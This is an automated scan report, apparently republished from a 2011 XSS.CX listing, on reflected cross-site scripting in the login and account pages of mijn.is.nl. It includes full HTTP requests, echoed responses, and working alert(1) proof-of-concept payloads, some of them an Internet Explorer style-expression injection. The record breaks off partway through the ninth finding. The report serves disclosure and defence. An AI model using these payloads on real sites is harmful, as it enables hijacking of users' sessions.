XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, mijn.is.nl

Report generated by XSS.CX at Wed Oct 05 09:16:15 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [REST URL parameter 1]

1.2. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [REST URL parameter 2]

1.3. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [REST URL parameter 3]

1.4. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [name of an arbitrarily supplied request parameter]

1.5. https://mijn.is.nl/UI/Pages/Login.aspx [REST URL parameter 1]

1.6. https://mijn.is.nl/UI/Pages/Login.aspx [REST URL parameter 2]

1.7. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]

1.8. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]

1.9. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]

1.10. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]

1.11. https://mijn.is.nl/UI/Pages/Login.aspx [name of an arbitrarily supplied request parameter]

1.12. https://mijn.is.nl/UI/Pages/Login.aspx [name of an arbitrarily supplied request parameter]

1.13. https://mijn.is.nl/UI/Pages/SSL/ [name of an arbitrarily supplied request parameter]

1.14. https://mijn.is.nl/UI/Pages/SSL/ [name of an arbitrarily supplied request parameter]

2. Password field with autocomplete enabled

3. Source code disclosure

4. Cross-domain POST

4.1. https://mijn.is.nl/UI/Pages/Login.aspx

4.2. https://mijn.is.nl/UI/Pages/SSL/

5. Cross-domain Referer leakage

6. Robots.txt file

7. SSL certificate



1. Cross-site scripting (reflected)  next
There are 14 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mijn.is.nl
Path:   /UI/Pages/ControlPanel/MyAccount.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad796'%3bd2e827310d4 was submitted in the REST URL parameter 1. This input was echoed as ad796';d2e827310d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UIad796'%3bd2e827310d4/Pages/ControlPanel/MyAccount.aspx HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/login-is-interned-services-klanten.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:41:38 GMT
Content-Length: 37982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
false,
'',
'https://mijn.is.nl/UI/Pages/ErrorPage.aspx?aspxerrorpath=/UIad796';d2e827310d4/Pages/ControlPanel/MyAccount.aspx',
false,
true));
}
</script>
...[SNIP]...

1.2. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mijn.is.nl
Path:   /UI/Pages/ControlPanel/MyAccount.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ca1'%3b243e3db1fcb was submitted in the REST URL parameter 2. This input was echoed as 45ca1';243e3db1fcb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pages45ca1'%3b243e3db1fcb/ControlPanel/MyAccount.aspx HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/login-is-interned-services-klanten.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:42:07 GMT
Content-Length: 37982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
false,
'',
'https://mijn.is.nl/UI/Pages/ErrorPage.aspx?aspxerrorpath=/UI/Pages45ca1';243e3db1fcb/ControlPanel/MyAccount.aspx',
false,
true));
}
</script>
...[SNIP]...

1.3. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mijn.is.nl
Path:   /UI/Pages/ControlPanel/MyAccount.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feaea'%3b805a80a9007 was submitted in the REST URL parameter 3. This input was echoed as feaea';805a80a9007 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pages/ControlPanelfeaea'%3b805a80a9007/MyAccount.aspx HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/login-is-interned-services-klanten.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:42:32 GMT
Content-Length: 37982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
'',
'https://mijn.is.nl/UI/Pages/ErrorPage.aspx?aspxerrorpath=/UI/Pages/ControlPanelfeaea';805a80a9007/MyAccount.aspx',
false,
true));
}
</script>
...[SNIP]...

1.4. https://mijn.is.nl/UI/Pages/ControlPanel/MyAccount.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/ControlPanel/MyAccount.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a77ac'-alert(1)-'5dfb0be2b90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pages/ControlPanel/MyAccount.aspx?a77ac'-alert(1)-'5dfb0be2b90=1 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/login-is-interned-services-klanten.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:41:21 GMT
Content-Length: 45783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
'',
'https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspx?a77ac'-alert(1)-'5dfb0be2b90=1&a77ac'-alert(1)-'5dfb0be2b90=1',
false,
true));
}
</script>
...[SNIP]...

1.5. https://mijn.is.nl/UI/Pages/Login.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66aa4'%3b392d3a9bad9 was submitted in the REST URL parameter 1. This input was echoed as 66aa4';392d3a9bad9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI66aa4'%3b392d3a9bad9/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw** HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:37:58 GMT
Content-Length: 37905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
false,
'',
'https://mijn.is.nl/UI/Pages/ErrorPage.aspx?aspxerrorpath=/UI66aa4';392d3a9bad9/Pages/Login.aspx',
false,
true));
}
</script>
...[SNIP]...

1.6. https://mijn.is.nl/UI/Pages/Login.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6821'%3bab3a3129d26 was submitted in the REST URL parameter 2. This input was echoed as c6821';ab3a3129d26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UI/Pagesc6821'%3bab3a3129d26/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw** HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:38:34 GMT
Content-Length: 37905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
false,
'',
'https://mijn.is.nl/UI/Pages/ErrorPage.aspx?aspxerrorpath=/UI/Pagesc6821';ab3a3129d26/Login.aspx',
false,
true));
}
</script>
...[SNIP]...

1.7. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18ca2'style%3d'x%3aexpression(alert(1))'97a958d0134 was submitted in the ReturnUrl parameter. This input was echoed as 18ca2'style='x:expression(alert(1))'97a958d0134 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspx18ca2'style%3d'x%3aexpression(alert(1))'97a958d0134 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://is.nl/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.5.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:37:41 GMT
Content-Length: 45695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<a href='https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspx18ca2'style='x:expression(alert(1))'97a958d0134'>
...[SNIP]...

1.8. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd95e'%3balert(1)//9fafaabb590 was submitted in the ReturnUrl parameter. This input was echoed as fd95e';alert(1)//9fafaabb590 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspxfd95e'%3balert(1)//9fafaabb590 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
Content-Length: 14563
Cache-Control: max-age=0
Origin: https://mijn.is.nl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://mijn.is.nl/UI/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw**
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

ctl00_ajaxScriptManager_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjYyMjgxNjc5D2QWAmYPDxYCHghDdXN0b21lcjK%2FEwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABMSVMuSXNpcy5TaG9wLldlYi5CY
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:41:05 GMT
Content-Length: 46242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
'',
'https://mijn.is.nl/UI/Pages/Login.aspx?ReturnUrl=/UI/Pages/ControlPanel/MyAccount.aspxfd95e';alert(1)//9fafaabb590',
false,
true));
}
</script>
...[SNIP]...

1.9. https://mijn.is.nl/UI/Pages/Login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /UI/Pages/Login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b4933'style%3d'x%3aexpression(alert(1))'bbea1f2ef55 was submitted in the ReturnUrl parameter. This input was echoed as b4933'style='x:expression(alert(1))'bbea1f2ef55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /UI/Pages/Login.aspx?ReturnUrl=%2fUI%2fPages%2fControlPanel%2fMyAccount.aspxb4933'style%3d'x%3aexpression(alert(1))'bbea1f2ef55 HTTP/1.1
Host: mijn.is.nl
Connection: keep-alive
Content-Length: 14563
Cache-Control: max-age=0
Origin: https://mijn.is.nl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://mijn.is.nl/UI/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw**
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
